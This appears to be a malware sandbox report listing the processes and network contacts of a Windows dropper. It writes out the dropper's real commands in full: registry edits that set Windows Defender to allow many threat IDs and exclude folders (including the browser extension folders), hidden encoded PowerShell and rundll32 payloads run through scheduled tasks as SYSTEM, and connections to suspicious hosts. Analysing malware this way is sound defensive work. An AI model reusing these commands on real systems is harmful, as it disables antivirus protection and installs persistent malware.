C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe em /OQsite_idAGR 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gMcnYgWbv" /SC once /ST 04:16:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gMcnYgWbv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gMcnYgWbv"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 13:59:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe\" XT /rBsite_idGuS 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe XT /rBsite_idGuS 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DnXqKSf.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:13:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll\",#1 /Fosite_idXfG 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe

"C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe

C:\Windows\SYSTEM32\msiexec.exe

"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.169.89:443 yip.su tcp
US 104.20.4.235:443 pastebin.com tcp
RU 193.233.132.234:80 193.233.132.234 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 77.221.151.32:80 77.221.151.32 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 104.26.8.202:443 grabify.link tcp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
